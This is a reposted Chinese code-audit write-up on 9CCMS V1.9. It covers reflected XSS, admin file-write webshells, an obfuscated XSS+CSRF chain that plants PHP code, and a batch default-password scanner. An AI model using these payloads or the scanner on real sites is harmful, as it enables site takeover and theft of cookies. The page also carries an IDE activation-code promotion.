1. 全栈程序员必看首页

代码审计系列:久草CMS(9CCMS)V1.9

全栈程序员-站长 未分类 阅读 1

代码审计系列:久草CMS(9CCMS)V1.9偶然看到一篇9CCMS(久草CMS)V1.9弱口令+后台拿shell的文章,兴起去找来源码进行审计

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

前言

偶然看到一篇9CCMS(久草CMS) V1.9 弱口令+后台拿shell的文章
兴起去找来源码看看,下载源码

审计了下有下面这些洞

1、前台反射XSS

在文件static/home/videojs/index.php中有

<script type="text/javascript">

var vPath = '<?php include('../../../Php/Public/Helper.php'); echo safeRequest($_GET['Play']);?>';

var logo = '';
var myVideo=initVideo({ 
   
      id:'myVideo',
      url:vPath,
      ad:{ 
   
          pre:{ 
   
               url:'',
               link:'',
               },
      },
      logo:{ 
   
         url:'logo.png',
         width:'100px'
         },
      });
</script>

跟踪saferequest

<?php
function safeRequest($data){ 
   
    $data = stripslashes($data); // 刪除反斜杠
    $data = htmlspecialchars($data); //把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体:
    return $data;
}
?>

发现只处理了反斜杠和尖括号
但是它已经在script标签中
所以只要阶段标签就会触发XSS

?Play=%27;alert(document.cookie);%27

在这里插入图片描述

2、后台广告添加文件写入

php/admin/home/ad/adjs.php文件中有:

<?php

$postAdJs = $_POST['AdJs'];
if (isset($_POST['submit']) && isset($postAdJs)) { 
   
$file = fopen("../JCSQL/Admin/Ad/AdminAdJs.php","w");
fwrite($file,$postAdJs);
fclose($file);  
?>

未对传递进来的数据进行过滤
并且直接写到了/JCSQL/Admin/Ad/AdminAdJs.php文件中
可直接getshell

在这里插入图片描述
在这里插入图片描述
不过无法执行命令
要用蚁剑插件绕过

在这里插入图片描述

3、密码修改文件写入

php/admin/home/security/userpass.php文件中有:

<?php

if (isset($_POST['submit']) && isset($_POST['username']) && isset($_POST['password'])  && isset($_POST['ippass']) ) { 
   
function post_input($data){ 
   $data = stripslashes($data);$data = htmlspecialchars($data);return $data;}
$username = post_input($_POST["username"]);
$password = post_input($_POST["password"]);  
$ippass = post_input($_POST["ippass"]);
  $str = '';
  $str .= '<?php';
  $str .= "n";
  $str .= '//后台密码';
  $str .= "n";
  $str .= 'define('USERNAME', ''.$username.'');';
  $str .= "n";
  $str .= 'define('PASSWORD', ''.$password.'');';
  $str .= "n";
  $str .= 'define('IPPASS', ''.$ippass.'');';
  $str .= "n";  
  $str .= '?>';
  $ff = fopen("../JCSQL/Admin/Security/AdminUser.php",'w+');
  fwrite($ff,$str);
?>

除了做了html实体编码和删除反斜杠以外,未作任何安全处理
直接写入/JCSQL/Admin/Security/AdminUser.php文件中
这里也可以直接拿shell

在这里插入图片描述
在这里插入图片描述

4、前台XSS+CSRF+文件写入

后台所有请求都未添加CSRF token
那不就一个组合拳了

payload如下:

/static/home/videojs/index.php?Play=';eval(atob('dmFyIGh0dHBSZXF1ZXN0ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7Cmh0dHBSZXF1ZXN0Lm9wZW4oJ1BPU1QnLCAnaHR0cDovLzE5Mi4xNjguMTguMTMxL2FkbWlueC8%2fUGhwPUhvbWUvQWQvQWRKcycsIHRydWUpOyAKaHR0cFJlcXVlc3Quc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC10eXBlIiwiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7Cmh0dHBSZXF1ZXN0LnNlbmQoJ0FkSnM9MTIzJTNDJTNGcGhwK3BocGluZm8lMjglMjklM0IlM0YlM0Umc3VibWl0PScpOwpodHRwUmVxdWVzdC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7CiAgICBpZiAoaHR0cFJlcXVlc3QucmVhZHlTdGF0ZSA9PSA0ICYmIGh0dHBSZXF1ZXN0LnN0YXR1cyA9PSAyMDApIHsKICAgICAgICB2YXIganNvbiA9IGh0dHBSZXF1ZXN0LnJlc3BvbnNlVGV4dDsKICAgICAgICBjb25zb2xlLmxvZyhqc29uKTsKICAgIH0KfTs%3D'));'

管理员点击该链接可写入webshell

5、弱口令

开头那篇文章的师傅的一个检测脚本

#!/usr/bin/env python
# -*- coding:utf-8 -*-

import time
import requests
import os
from requests.sessions import session
os.system('')
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# 禁用安全请求警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
class poc():
    def title(self):
        print(''' +-----------------------------------------------------------------+ 漏洞名称:9CCCMS 弱口令 功能:单个检测,批量检测 单个检测:python poc.py -u url 批量检测:python poc.py -f 1.txt +-----------------------------------------------------------------+ ''')
    def poc(self, target_ur):
        url = f'{target_ur}/adminx/'
        headers = { 
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
        try:
            res = requests.get(url=url, headers=headers,verify=False,timeout=10)
            return res
        except Exception as e:
            print("\033[31m[x] 请求失败 \033[0m", e)
    def main(self, target_url, file):
        self.title()
        count=0
        if target_url:
            res=self.poc(target_url)
            if res.status_code==200 and "当前使用的是默认账号" in res.text:
                print(f'\033[31m[+] {target_url} 存在弱口令:9ccms/9ccms \033[0m')
        if file:
            for url in file:
                count += 1
                target_url = url.replace('\n', '')  #取消换行符
                #time.sleep(1)
                res=self.poc(target_url)
                try:
                    if res.status_code==200 and "当前使用的是默认账号" in res.text:
                        print(f'\033[31m[{count}] 响应值为200,{target_url} 存在弱口令:9ccms/9ccms\033[0m')
                    else:
                        print(f'[{count}] 响应值为{res.status_code},{target_url} 不存在弱口令')
                except Exception as e:
                    print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url',type=str,default=False,help="目标地址,带上http://")
    parser.add_argument("-f",'--file', type=argparse.FileType('r'),default=False,help="批量检测,带上http://")
    args = parser.parse_args()
    run = poc()
    run.main(args.url, args.file)

结语

后台都是洞啊

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/180200.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • python里[::-1]_python中的数组类型

    python里[::-1]_python中的数组类型

    python里[::-1]_python中的数组类型目录1.python数组下标2.b=a[i:j]3.b=a[i:j:k]1.python数组下标python下标有两套,一套是正的,一套是负的,a=’python’的下表如下python正下标012345负下标-6-5-4-3-2-1使用正下标时,下标i取值范围为0<=i<len(a)超出范围为越界使用负下标时,下标i取值范围为-1>=i>-len(a)-1超出范围为越界2.b=a[i:

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月13日
    4
  • qtcpsocket用法_qtcpsocket发送16进制数据

    qtcpsocket用法_qtcpsocket发送16进制数据

    qtcpsocket用法_qtcpsocket发送16进制数据在QTcpSocket中的tcp通信,发送数据,接收数据都是QTcpSocket套接字的功能,包括server端,QTcpServer的功能仅仅是作为一个服务器的存在;客户端:classClient:publicQWidget{Q_OBJECTpublic:explicitClient(QWidget*parent=0);~Cl…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月10日
    2
  • word输入矩阵卡死,导致word在试图打开文件时遇到错误

    word输入矩阵卡死,导致word在试图打开文件时遇到错误

    word输入矩阵卡死,导致word在试图打开文件时遇到错误问题:今天用officeword2019输入一个矩阵的时候,突然卡死了。强制关闭了word。再打开就变成这样了。解决方法:试了网上说的那种,打开文件时选择打开并修复还是不行。最后发给同学看看能不能用wps打开。没想到他打开了。所以,wps牛逼!!…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月20日
    48
  • Query $.each用法

    Query $.each用法

    Query $.each用法Query each 用法以下内容非原创 来自百度文库 http wenku baidu com view 4796b6145f0e html nbsp 通过它 你可以遍历对象 数组的属性值并进行处理 使用说明 each 函数根据参数的类型实现的效果不完全一致 1 遍历对象 有附加参数 each Object function p1 p2

    全栈程序员-站长的头像 全栈程序员-站长
    2025年8月25日
    0
  • JavaCodeTra 猴子选猴王 约瑟夫循环

    JavaCodeTra 猴子选猴王 约瑟夫循环

    JavaCodeTra 猴子选猴王 约瑟夫循环

    全栈程序员-站长的头像 全栈程序员-站长
    2022年2月2日
    58
  • 学了一天java,我总结了这些知识点

    学了一天java,我总结了这些知识点

    学了一天java,我总结了这些知识点大家好,我是KookNut39也是Tommy,在CSDN写文,写Java时候我是Tommy,分享一些自己认为在学习过程中比较重要的东西,致力于帮助初学者入门,希望可以帮助你进步。以前一直更新C/C++方面的知识,今天是我第一次更新Java方面的知识,以后会持续更新,感兴趣的欢迎关注博主,和博主一起从0学习Java知识。大家可以去专栏查看之前的文章,希望未来能和大家共同探讨技术。文章目录1.注释(1)单行注释(2)多行注释(3)文档注释2.关键字3.保留字4.标识符5.Java数据类型(1)基本数据类型.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月27日
    57

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号